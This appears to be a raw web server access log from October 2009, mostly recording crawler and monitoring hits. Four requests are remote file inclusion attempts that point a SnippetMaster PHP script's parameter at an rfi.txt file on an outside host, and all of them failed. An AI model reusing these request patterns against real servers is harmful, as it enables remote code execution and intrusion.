95.108.150.235 - - [17/Oct/2009:02:11:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
95.108.150.235 - - [17/Oct/2009:02:11:31 -0400] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
95.108.150.235 - - [17/Oct/2009:02:11:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
95.108.150.235 - - [17/Oct/2009:02:11:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; H)"
119.63.199.38 - - [17/Oct/2009:02:12:26 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
211.206.120.162 - - [17/Oct/2009:02:12:49 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://cocojewelry.com/upload/bbs/rfi.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
211.206.120.162 - - [17/Oct/2009:02:12:49 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://cocojewelry.com/upload/bbs/rfi.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
211.206.120.162 - - [17/Oct/2009:02:12:52 -0400] "GET /logs/access_log.Q109053000//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://cocojewelry.com/upload/bbs/rfi.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
211.206.120.162 - - [17/Oct/2009:02:13:42 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://cocojewelry.com/upload/bbs/rfi.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
209.59.12.99 - - [17/Oct/2009:02:14:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.218.116.164 - - [17/Oct/2009:02:15:25 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
